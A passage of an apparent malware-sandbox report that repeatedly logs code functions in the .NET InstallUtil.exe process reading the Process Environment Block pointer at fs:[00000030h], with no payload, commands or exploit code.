Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01256399 mov eax, dword ptr fs:[00000030h]2_2_01256399
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01256399 mov eax, dword ptr fs:[00000030h]2_2_01256399
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01256399 mov eax, dword ptr fs:[00000030h]2_2_01256399
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124ABFE mov eax, dword ptr fs:[00000030h]2_2_0124ABFE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124ABFE mov eax, dword ptr fs:[00000030h]2_2_0124ABFE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01259BC7 mov eax, dword ptr fs:[00000030h]2_2_01259BC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012463C2 mov ecx, dword ptr fs:[00000030h]2_2_012463C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012463C2 mov ecx, dword ptr fs:[00000030h]2_2_012463C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012463C2 mov eax, dword ptr fs:[00000030h]2_2_012463C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012463C2 mov ecx, dword ptr fs:[00000030h]2_2_012463C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012463C2 mov ecx, dword ptr fs:[00000030h]2_2_012463C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012463C2 mov eax, dword ptr fs:[00000030h]2_2_012463C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012463C2 mov ecx, dword ptr fs:[00000030h]2_2_012463C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012463C2 mov ecx, dword ptr fs:[00000030h]2_2_012463C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012463C2 mov eax, dword ptr fs:[00000030h]2_2_012463C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012463C2 mov ecx, dword ptr fs:[00000030h]2_2_012463C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012463C2 mov ecx, dword ptr fs:[00000030h]2_2_012463C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012463C2 mov eax, dword ptr fs:[00000030h]2_2_012463C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012A3BD8 mov eax, dword ptr fs:[00000030h]2_2_012A3BD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D13D8 mov eax, dword ptr fs:[00000030h]2_2_012D13D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124523D mov eax, dword ptr fs:[00000030h]2_2_0124523D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124523D mov eax, dword ptr fs:[00000030h]2_2_0124523D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124523D mov eax, dword ptr fs:[00000030h]2_2_0124523D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124523D mov eax, dword ptr fs:[00000030h]2_2_0124523D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124523D mov eax, dword ptr fs:[00000030h]2_2_0124523D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124523D mov eax, dword ptr fs:[00000030h]2_2_0124523D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01213200 mov eax, dword ptr fs:[00000030h]2_2_01213200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01218209 mov eax, dword ptr fs:[00000030h]2_2_01218209
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01218209 mov eax, dword ptr fs:[00000030h]2_2_01218209
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01218209 mov eax, dword ptr fs:[00000030h]2_2_01218209
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012E3A05 mov eax, dword ptr fs:[00000030h]2_2_012E3A05
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012E3A05 mov eax, dword ptr fs:[00000030h]2_2_012E3A05
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01219210 mov eax, dword ptr fs:[00000030h]2_2_01219210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01219210 mov eax, dword ptr fs:[00000030h]2_2_01219210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01219210 mov eax, dword ptr fs:[00000030h]2_2_01219210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01219210 mov eax, dword ptr fs:[00000030h]2_2_01219210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01296A16 mov eax, dword ptr fs:[00000030h]2_2_01296A16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01296A16 mov eax, dword ptr fs:[00000030h]2_2_01296A16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01296A16 mov eax, dword ptr fs:[00000030h]2_2_01296A16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124EA6E mov eax, dword ptr fs:[00000030h]2_2_0124EA6E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124EA6E mov eax, dword ptr fs:[00000030h]2_2_0124EA6E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124EA6E mov eax, dword ptr fs:[00000030h]2_2_0124EA6E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01215275 mov eax, dword ptr fs:[00000030h]2_2_01215275
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01215275 mov eax, dword ptr fs:[00000030h]2_2_01215275
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01215275 mov eax, dword ptr fs:[00000030h]2_2_01215275
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01215275 mov eax, dword ptr fs:[00000030h]2_2_01215275
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01215275 mov eax, dword ptr fs:[00000030h]2_2_01215275
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012E0A74 mov eax, dword ptr fs:[00000030h]2_2_012E0A74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D1A71 mov eax, dword ptr fs:[00000030h]2_2_012D1A71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D1243 mov eax, dword ptr fs:[00000030h]2_2_012D1243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01244A5B mov eax, dword ptr fs:[00000030h]2_2_01244A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01244A5B mov eax, dword ptr fs:[00000030h]2_2_01244A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01229AA0 mov eax, dword ptr fs:[00000030h]2_2_01229AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01229AA0 mov eax, dword ptr fs:[00000030h]2_2_01229AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0123B2A0 mov eax, dword ptr fs:[00000030h]2_2_0123B2A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012342B0 mov eax, dword ptr fs:[00000030h]2_2_012342B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012342B0 mov eax, dword ptr fs:[00000030h]2_2_012342B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012342B0 mov eax, dword ptr fs:[00000030h]2_2_012342B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012342B0 mov eax, dword ptr fs:[00000030h]2_2_012342B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012342B0 mov ecx, dword ptr fs:[00000030h]2_2_012342B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124328D mov eax, dword ptr fs:[00000030h]2_2_0124328D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124328D mov eax, dword ptr fs:[00000030h]2_2_0124328D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124328D mov eax, dword ptr fs:[00000030h]2_2_0124328D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01293284 mov eax, dword ptr fs:[00000030h]2_2_01293284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01293284 mov eax, dword ptr fs:[00000030h]2_2_01293284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124F289 mov eax, dword ptr fs:[00000030h]2_2_0124F289
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012112F4 mov eax, dword ptr fs:[00000030h]2_2_012112F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01211AC0 mov eax, dword ptr fs:[00000030h]2_2_01211AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012422C3 mov eax, dword ptr fs:[00000030h]2_2_012422C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012422C3 mov eax, dword ptr fs:[00000030h]2_2_012422C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012422C3 mov eax, dword ptr fs:[00000030h]2_2_012422C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D12CA mov eax, dword ptr fs:[00000030h]2_2_012D12CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012AB2C0 mov eax, dword ptr fs:[00000030h]2_2_012AB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012AB2C0 mov ecx, dword ptr fs:[00000030h]2_2_012AB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012AB2C0 mov eax, dword ptr fs:[00000030h]2_2_012AB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012AB2C0 mov eax, dword ptr fs:[00000030h]2_2_012AB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012AB2C0 mov eax, dword ptr fs:[00000030h]2_2_012AB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012AB2C0 mov eax, dword ptr fs:[00000030h]2_2_012AB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124E52F mov ecx, dword ptr fs:[00000030h]2_2_0124E52F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124E52F mov eax, dword ptr fs:[00000030h]2_2_0124E52F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124E52F mov eax, dword ptr fs:[00000030h]2_2_0124E52F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01231530 mov eax, dword ptr fs:[00000030h]2_2_01231530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01231530 mov eax, dword ptr fs:[00000030h]2_2_01231530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01231530 mov eax, dword ptr fs:[00000030h]2_2_01231530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01231530 mov eax, dword ptr fs:[00000030h]2_2_01231530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01231530 mov eax, dword ptr fs:[00000030h]2_2_01231530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01231530 mov eax, dword ptr fs:[00000030h]2_2_01231530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01231530 mov eax, dword ptr fs:[00000030h]2_2_01231530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01231530 mov eax, dword ptr fs:[00000030h]2_2_01231530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01231530 mov eax, dword ptr fs:[00000030h]2_2_01231530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01231530 mov eax, dword ptr fs:[00000030h]2_2_01231530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01231530 mov eax, dword ptr fs:[00000030h]2_2_01231530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01231530 mov eax, dword ptr fs:[00000030h]2_2_01231530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01231530 mov eax, dword ptr fs:[00000030h]2_2_01231530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D0D1B mov eax, dword ptr fs:[00000030h]2_2_012D0D1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012A3D10 mov eax, dword ptr fs:[00000030h]2_2_012A3D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0121356C mov eax, dword ptr fs:[00000030h]2_2_0121356C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0121356C mov eax, dword ptr fs:[00000030h]2_2_0121356C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0124056B mov eax, dword ptr fs:[00000030h]2_2_0124056B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D15A8 mov eax, dword ptr fs:[00000030h]2_2_012D15A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01259DAF mov eax, dword ptr fs:[00000030h]2_2_01259DAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01212DAA mov eax, dword ptr fs:[00000030h]2_2_01212DAA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01212DAA mov eax, dword ptr fs:[00000030h]2_2_01212DAA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01212DAA mov eax, dword ptr fs:[00000030h]2_2_01212DAA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01212DAA mov eax, dword ptr fs:[00000030h]2_2_01212DAA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01212DAA mov eax, dword ptr fs:[00000030h]2_2_01212DAA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012135B1 mov eax, dword ptr fs:[00000030h]2_2_012135B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01240584 mov eax, dword ptr fs:[00000030h]2_2_01240584
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012BE58A mov ecx, dword ptr fs:[00000030h]2_2_012BE58A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012BE58A mov eax, dword ptr fs:[00000030h]2_2_012BE58A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012BE58A mov eax, dword ptr fs:[00000030h]2_2_012BE58A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012BE58A mov eax, dword ptr fs:[00000030h]2_2_012BE58A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012D0D8A mov eax, dword ptr fs:[00000030h]2_2_012D0D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012E8589 mov eax, dword ptr fs:[00000030h]2_2_012E8589
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012DE581 mov eax, dword ptr fs:[00000030h]2_2_012DE581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0123F591 mov eax, dword ptr fs:[00000030h]2_2_0123F591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0123F591 mov eax, dword ptr fs:[00000030h]2_2_0123F591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0123F591 mov eax, dword ptr fs:[00000030h]2_2_0123F591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_012E5595 mov eax, dword ptr fs:[00000030h]2_2_012E5595
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01231D9D mov eax, dword ptr fs:[00000030h]2_2_01231D9D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01231D9D mov eax, dword ptr fs:[00000030h]2_2_01231D9D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01231D9D mov eax, dword ptr fs:[00000030h]2_2_01231D9D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01231D9D mov eax, dword ptr fs:[00000030h]2_2_01231D9D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01231D9D mov eax, dword ptr fs:[00000030h]2_2_01231D9D